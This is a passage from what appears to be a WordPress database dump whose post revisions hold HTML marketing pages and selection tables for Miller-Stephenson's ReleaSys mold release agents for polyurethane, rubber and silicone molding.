href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a>\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a>\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 19:53:39', '2016-11-04 19:53:39', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2901, 3, '2016-11-04 19:56:57', '2016-11-04 19:56:57', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:56:57', '2016-11-04 19:56:57', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2902, 3, '2016-11-04 19:57:58', '2016-11-04 19:57:58', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys Silicone Mold Release Agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Low Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 